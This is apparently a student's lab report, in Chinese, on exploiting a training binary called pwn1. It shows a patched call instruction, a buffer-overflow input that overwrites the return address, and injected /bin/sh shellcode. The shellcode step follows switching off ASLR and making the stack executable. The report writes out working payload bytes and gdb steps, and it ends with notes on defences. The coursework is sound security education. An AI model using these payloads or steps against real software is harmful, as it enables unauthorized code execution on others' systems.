首页 > 其他分享 >20222313 2024-2025-1《网络与系统攻防技术》实验一报告

20222313 2024-2025-1《网络与系统攻防技术》实验一报告

时间:2024-10-10 16:25:11浏览次数:7  
标签:x90 2024 2025 地址 pwn20222313 机器指令 shellcode 输入 20222313

1.实验内容

本次实践的对象是一个名为pwn1的linux可执行文件。
该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串。
该程序同时包含另一个代码片段,getShell,会返回一个可用Shell。正常情况下这个代码是不会被运行的。我们实践的目标就是想办法运行这个代码片段。我们将学习两种方法运行这个代码片段,然后学习如何注入运行任何Shellcode。

三个实践内容如下:

  • 1.手工修改可执行文件,改变程序执行流程,直接跳转到getShell函数。
  • 2.利用foo函数的Bof漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getShell函数。
  • 3.注入一个自己制作的shellcode并运行这段shellcode。

基础知识:

  • 1.熟悉Linux基本操作
    常用指令:
    ls:列出目录内容。
    cd:更改当前工作目录。
    mkdir:创建新的目录。
    rm:删除文件或目录。
    cp:复制文件或目录。
    mv:移动或重命名文件或目录。
    grep:搜索文本中的模式。
    find:查找文件。
    管道(|):允许将一个命令的输出作为另一个命令的输入,例如 ls | grep txt 会列出所有名称中包含“txt”的文件。

  • 2.理解Bof的原理。
    Bof是一种常见的安全漏洞,当程序尝试向缓冲区写入超过其容量的数据时发生。这可能导致数据溢出到相邻的内存空间,从而破坏其他数据或者执行恶意代码。
    汇编语言是低级编程语言,直接对应于机器指令。理解汇编可以帮助了解底层的操作细节。
    EIP在x86架构中指向下一条要执行的指令地址。在BoF攻击中,攻击者可能试图控制EIP来让CPU执行他们想要的代码。
    通过溢出缓冲区,攻击者可以改写栈上的返回地址,使得函数返回后跳转到恶意代码的位置。

  • 3.会使用gdb,vi。
    使用GDB的一些基本命令包括:
    run:开始执行程序。
    break:设置断点。
    continue:继续执行直到下一个断点。
    step:单步执行。
    print:打印变量值。
    vi/vim 插入模式的一些基本命令包括:
    i:进入插入模式。
    :w:保存文件。
    :q:退出编辑器。
    :wq 或 ZZ:保存并退出。
    :q!:不保存退出。

  • 4.hellcode就是一段机器指令(code)
    通常这段机器指令的目的是为获取一个交互式的shell(像linux的shell或类似windows下的cmd.exe),所以这段机器指令被称为shellcode。
    在实际的应用中,凡是用来注入的机器指令段都通称为shellcode,像添加一个用户、运行一条指令。

2.实验过程

  1. 直接修改程序机器指令,改变程序执行流程

首先cp pwn1 pwn20222313_1,将pwn1复制出一份pwn20222313_1。

在终端输入objdump -d pwn20222313_1 | more,对pwn20222313_1进行反汇编。

先看第12行,"call 8048491 "是汇编指令
是说这条指令将调用位于地址8048491处的foo函数;
其对应机器指令为“e8 d7ffffff”,e8即跳转之意。
本来正常流程,此时此刻EIP的值应该是下条指令的地址,即80484ba。
main函数调用foo,对应机器指令为“ e8 d7ffffff”,如果让它调用getShell,只要修改“d7ffffff”为"getShell-80484ba"对应的补码就行,可知补码为c3ffffff。
接着利用vi pwn20222313_1修改pwn20222313_1文件内容,将其中的call指令的目标地址由d7ffffff变为c3ffffff。

打开文件后为乱码,按esc。输入:%!xxd将文件转化为十六进制读取形式,输入/e8 d7找到需要修改的位置。

按i进入插入模式,进行修改。

修改完成后,输入:%!xxd -r:wq保存并退出。
输入./pwn20222313_1运行更改后的文件,成功得到shell提示符。

  1. 通过构造输入参数,造成BOF攻击,改变程序执行流

复制pwn1得到一份pwn20222313_2。
在终端输入sudo apt updatesudo apt install gdb安装gdb。

输入gdb pwn20222313_2调试程序,输入r,输入1111111122222222333333334444444455555555

输入info r查看寄存器eip的值,可以看到,eip中的值被修改成了 0x35353535,也就是说这时候eip里存的数据是"5555"(因为5的ASCII码是0x35),而我们输入长度已经超过了原本缓冲区的28字节,字符串的“555555555”部分溢出覆盖掉了eip的部分。

再次先输入gdb pwn20222313_2和r调试程序,输入1111111122222222333333334444444412345678。

输入info r查看寄存器eip的值,看到eip中的值变成了 0x34333231,也就是说里面存的字符是"4321",由此我们看到输入字符串“111111..12345678”中的“1234”覆盖掉原本堆栈中的返回地址。

结合之前反汇编的内容得知getShell的地址为804847d。

perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"'> input20222313
查看input20222313中的内容xxd input20222313

输入(cat input20222313;cat)| ./pwn20222313_2将input20222313中的内容输入pwn20222313_2中,发现执行成功。

  1. 注入Shellcode并执行

准备工作:
输入下列指令对系统进行设置:
execstack -s pwn20222313_3
execstack -q pwn20222313_3
more /proc/sys/kernel/randomize_va_space
sudo su
echo "0" > /proc/sys/kernel/randomize_va_space
more /proc/sys/kernel/randomize_va_space


生成一个shellcode:
perl -e 'print "\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x4\x3\x2\x1\x00"' > input_shellcode
输入(cat input_shellcode;cat) | ./pwn20222313_3进行注入。

打开一个新终端,输入ps -ef | grep pwn20222313_3查找进程号。

27897就是我们需要的进程号。
打开gdb进行调试,输入attach 27897调试进程,输入disassemble foo设置断点,查看要注入的内存地址。

可以看到,地址是0x080484ae,输入break *0x080484ae,把断点设置在080484ae。

在最开始的终端按下回车,然后在新打开的终端输入c继续运行,输入info r esp,查看esp地址,发现shellcode地址为0xffffd38c

输入x/16x 0xffffd38c,发现0xffffd38c的地址内存储着01020304

栈顶指针地址加四字节0xffffd38c+4=0xffffd390,所以shellcode中的x4\x3\x2\x1应该改为90\d3\ff\ff。
再次编写一个shellcode:
perl -e 'print "A" x 32;print "\x90\xd3\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode
再次注入:输入(cat input_shellcode;cat) | ./pwn20222313_3
顺利运行:

3.问题及解决方案

    • 问题1:在安装gdb时安装失败,发现libc6-dev 包需要的 binutils 版本低于 2.38,但系统中已经安装的 binutils 的版本是 2.37-10.1,两个并不兼容
  • 问题1解决方案:输入sudo apt install binutils 重新下载新版binutils,下载成功后顺利安装gdb。
    • 问题2:输入./pwn20222313_1执行文件时,提示“zsh:permission denied:/pwn20222313_1”
  • 问题2解决方案:在终端中输入chmod +x ./pwn20222313_1
    • 问题3:找不到execstack指令

  • 问题3解决方案:输入命令wget http://ftp.de.debian.org/debian/pool/main/p/prelink/execstack_0.0.20131005-1+b10_amd64.debsudo dpkg -i execstack_0.0.20131005-1+b10_amd64.deb

4.学习感悟、思考等

作为网络攻防的第一次实验,我从下载安装kali,学习linux环境下的指令开始,几乎是从0学习了各种技能和基础知识。这次实验首先明确了目标:针对一个Linux可执行文件进行操作,找到并利用程序中的缓冲区溢出漏洞来执行特定的shellcode。整个过程分为几个步骤,包括直接修改可执行文件以改变程序流程、构造输入参数引发缓冲区溢出从而控制程序执行流,以及最终注入并执行自定义的shellcode。
在学习过程中,我遇到了很多小问题,比如用户权限不够,指令找不到,地址没有加4等,在解决这些小问题的过程中,我对Linux系统有了更深入的理解。我了解了基本的Linux操作和常用命令对于完成此类实验的重要性,理解和掌握了基础的汇编语言,学会了构建有效的payload以及如何准备一段shellcode,并将其成功注入到目标程序中,实现远程攻击模拟。
实验说明,实施合适的保护措施对于网络安全是不可忽视的。从防御的角度出发,我还了解了多种防止缓冲区溢出攻击的方法,如启用堆栈不可执行(NX bit)、使用地址空间布局随机化(ASLR)等技术增加攻击难度。同时,指出即使采取了这些防护措施,攻击者仍可能通过其他技术手段绕过,例如ROP攻击。
这次学习不仅提高了对缓冲区溢出漏洞及其利用方法的理解,而且增强了对软件安全防护机制的认识,为今后在网络安全领域的工作打下了坚实的基础。

参考资料

标签:x90,2024,2025,地址,pwn20222313,机器指令,shellcode,输入,20222313
From: https://www.cnblogs.com/20222313rhn/p/18455969

相关文章

  • 2024/10/10
    中山市选2011杀人游戏一个环上的点可以通过询问环上任意一点来确定整个环的状态,有入度的点可以通过询问它之前的点来确定。所以我们先缩点。需要统计出所有入度为\(0\)的强连通分量的个数。注意一个特殊情况,若存在一个强连通分量满足它大小为\(1\),且它连接到的点的入度都不......
  • ChatGPT国内中文版镜像网站整理合集(2024/10/10最新)
    一、GPT中文镜像站①yixiaai.com支持GPT4、4o、o1、文件上传、知识库,支持MJ绘画②chat.lify.vip支持通用全模型,支持文件读取、插件、绘画、AIPPT③AIChat支持GPT3.5/4,4o以及MJ绘画1.什么是镜像站镜像站(MirrorSite)是指通过复制原始网站内容和结构,创建的备用网站。......
  • gjoi 2024.10.9
    当天在家里躺尸看t1过不了就去睡觉了,还好没写卡场Round哦/cf怎么有人吃错了一整盒退高烧药啊/wqT1游戏升级考虑有多少\(x\in[1,n]\)满足\(b_1+\lfloor\frac{a_1}{x}\rfloor=b_2+\lfloor\frac{a_2}{x}\rfloor\),直接对下取整做整除分块即可。gjoj卡常所以开longl......
  • 2024.10.10 1514版
    起于《海奥华预言》的思考◆地球管理结构和参考持续更新中...... 英文地址:https://github.com/zhuyongzhe/Earth/tags中文地址:https://www.cnblogs.com/zhuyongzhe85作者:朱永哲 ---------------------------------------------------------------------------------......
  • 20222326 2024-2025-1 《网络与系统攻防技术》实验一实验报告
    一、实验内容Linux基本操作的学习能熟练的熟悉文件修改、打开,查看文件夹内容能正常使用gdb、vi可以理解汇编语言、机器指令、EIP的内容等理解可执行文件和机器指令例如call指令反汇编指令objdump文件十六进制转换指令%!xxd与%!xxd-r逆向工程学习如何分析和......
  • 界面控件Kendo UI for jQuery 2024 Q3亮点 - 支持切换编辑模式
    随着最新的2024Q3版本,Progress使用户能够使用现成的页面模板和构建块更快地构建令人惊叹的应用程序,使您的Telerik和KendoUI开发体验更好。Telerik和KendoUI 2024Q3版本将焦点放在新推出的页面模板和构建块上,每个页面模板和构建块都预先配置了TelerikUIforBlazor、Kend......
  • SIGGRAPH Asia 2024 | 网易伏羲研究成果入选,3D面部动画技术再获新突破
    近日,国际计算机图形与交互技术顶会SIGGRAPHAsia2024公布论文接收结果:网易伏羲最新研究成果《FreeAvatar:Robust3DFacialAnimationTransferbyLearninganExpressionFoundationModel》成功入选。今年12月,SIGGRAPHAsia2024大会将在日本东京举行,届时网易伏羲实验室视觉......
  • 20222419 2024-2025-1 《网络与系统攻防技术》实验一实验报告
    1.实验内容1.1本周学习内容(1)了解了缓冲区溢出发展历史:红色代码、冲击波病毒、震荡波病毒、心脏出血、乌克兰断网、勒索病毒。(2)了解了缓冲区溢出漏洞的本质和危害:缓冲区溢出漏洞是由于程序没有进行严格的内存越界检查,导致数据溢出并覆盖相邻内存空间,从而可能被攻击者利用执行恶......
  • 2024.10.10 总结
    A:赛时发了什么疯非要来冲这题。不妨计各种颜色的宝石为0/1。考虑记前缀和的最大值为\(S_\max\),最小值为\(S_\min\),于是总的限制为\(|S_\max-S_\min|\leqk\)。考虑反向维护这个限制,即枚举一个\(i\),然后钦定\(i\leqS_\min\leqS_\max\leqi+k\),计算对应的序列个数。然后......
  • 2024-9-28
    新闻周刊2024.9.28导入:建立"定点医药机构相干人员"实行驾照式经分传统监管机构将从医药机构进一步精确到人的进步,让少部分违规人员收到更加严厉的处罚防止医保滥用,让违规者付出应有代价,确保医保资金真正惠民,让所有人都共同收益.视点:秋收"惠农"时农条机械化农......